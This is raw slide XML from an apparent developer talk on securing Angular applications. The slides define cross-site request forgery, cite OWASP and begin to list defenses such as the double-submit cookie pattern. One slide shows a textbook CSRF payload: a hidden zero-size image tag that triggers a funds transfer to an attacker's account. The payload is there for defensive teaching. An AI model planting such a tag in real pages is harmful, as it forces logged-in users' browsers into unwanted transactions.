        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15422975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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6653048"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800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF</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07504" y="1059582"/>
            <a:ext cx="9001000" cy="3672408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="1800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="50"/>
              </a:spcBef>
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>Overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" altLang="fr-FR" sz="1200" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR" sz="800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="270000" lvl="1" indent="-125">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>causes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>logged-on user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>web browser to perform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> unwanted action </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>on a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t> trusted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1100" dirty="0"/>
              <a:t>A8 - OWASP Top 10 vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="269875" lvl="1" indent="0">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1050" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="900" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" dirty="0"/>
              <a:t>Example </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" b="1" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>http://myBankSite.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>app</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>transferFunds?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>=1500&amp;destinationAccount=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>"  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>="0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" err="1" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>height</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>="0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" i="1" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>/&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1000" i="1" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Lucida Sans Unicode" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-CA" altLang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394075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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="283500"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="1600" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="700" b="0" dirty="0" smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-CA" altLang="fr-FR" sz="700" b="0" dirty="0"/>
              <a:t>://hydrasky.com/wp-content/uploads/2016/08/cross_site_request_forger_1.png.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="C:\Utilisateurs\fr20120\Desktop\techForum_2017\cross_site_request_forger_1.png.jpg"/>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683568" y="843558"/>
            <a:ext cx="6372787"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1100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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Titre 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé pour une image  4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>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23478"/>
            <a:ext cx="3608649" cy="4805963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>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223" y="1230355"/>
            <a:ext cx="5855635" cy="3293795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Espace réservé du contenu 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34657251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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="151200" y="195486"/>
            <a:ext cx="6869072" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF – Which Protection for Angular ?</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07504" y="699542"/>
            <a:ext cx="9001000" cy="3960440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Defenses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t> strategies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="700" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>Angular built-in mechanism : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Double Submit Cookie Pattern </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>&amp; Custom Request Header </a:t>
            </a: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9444" y="3742539"/>
            <a:ext cx="96202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4217729"/>
            <a:ext cx="915260" cy="270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0" name="Tableau 9"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
